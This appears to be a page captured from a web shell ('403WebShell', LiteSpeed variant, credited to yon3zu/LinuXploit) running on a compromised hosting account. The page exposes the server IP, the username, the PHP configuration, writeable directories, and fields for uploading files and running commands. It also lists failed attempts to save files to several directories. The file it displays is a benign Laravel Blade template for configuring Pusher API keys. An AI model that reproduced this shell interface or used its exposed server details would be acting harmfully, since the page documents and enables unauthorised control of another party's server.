Failed to save the file to the "xx" directory.

Failed to save the file to the "ll" directory.

Failed to save the file to the "mm" directory.

Failed to save the file to the "wp" directory.

403WebShell
403Webshell
Server IP : 66.29.132.124  /  Your IP : 3.17.165.196
Web Server : LiteSpeed
System : Linux business141.web-hosting.com 4.18.0-553.lve.el8.x86_64 #1 SMP Mon May 27 15:27:34 UTC 2024 x86_64
User : wavevlvu ( 1524)
PHP Version : 7.4.33
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /home/wavevlvu/book24.ng/modules/Core/Views/admin/settings/groups/parts/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /home/wavevlvu/book24.ng/modules/Core/Views/admin/settings/groups/parts/pusher.blade.php
@if(is_default_lang())
    <hr>
    <div class="row">
        <div class="col-sm-4">
            <h3 class="form-group-title">{{__('Config Broadcast')}}</h3>
            <p class="form-group-desc">{{__('Change your config broadcast site')}}</p>
        </div>
        <div class="col-sm-8">
            <div class="panel">
                <div class="panel-title"><strong>{{__("Broadcast Driver")}}</strong></div>
                <div class="panel-body">
                    <div class="form-group">
                        <div class="form-controls">
                            <select name="broadcast_driver" class="form-control">
                                @foreach(\Modules\Core\SettingClass::BROADCAST_DRIVER as $item=>$value)
                                    <option value="{{$value}}" {{setting_item('broadcast_driver') == $value ? 'selected' : ''  }}>{{__(strtoupper($value))}}</option>
                                @endforeach
                            </select>
                        </div>
                    </div>
                </div>
            </div>
        </div>
    </div>
    <hr>
    <div class="row">
        <div class="col-sm-4">
            <h3 class="form-group-title">{{__('Pusher API')}}</h3>
            <p class="form-group-desc">{{__('Change your API for pusher here. It will use for chat plugin and notification')}}</p>
        </div>
        <div class="col-sm-8">
            <div class="panel">
                <div class="panel-title"><strong>{{__("Pusher API Information")}}</strong></div>
                <div class="panel-body">
                    <div class="form-group" >
                        <label>{{__('API KEY')}}</label>
                        <div class="form-controls">
                            <input type="text" name="pusher_api_key" value="{{setting_item('pusher_api_key')}}" class="form-control">

                        </div>
                    </div>
                    <div class="form-group" >
                        <label>{{__('API Secret')}}</label>
                        <div class="form-controls">
                            <input type="text" name="pusher_api_secret" value="{{setting_item('pusher_api_secret')}}" class="form-control">

                        </div>
                    </div>
                    <div class="form-group" >
                        <label>{{__('APP ID')}}</label>
                        <div class="form-controls">
                            <input type="text" name="pusher_app_id" value="{{setting_item('pusher_app_id')}}" class="form-control">

                        </div>
                    </div>
                    <div class="form-group" >
                        <label>{{__('Cluster')}}</label>
                        <div class="form-controls">
                            <input type="text" name="pusher_cluster" value="{{setting_item('pusher_cluster')}}" class="form-control">

                        </div>
                    </div>
                </div>
            </div>

        </div>
    </div>

@endif

Youez - 2016 - github.com/yon3zu
LinuXploit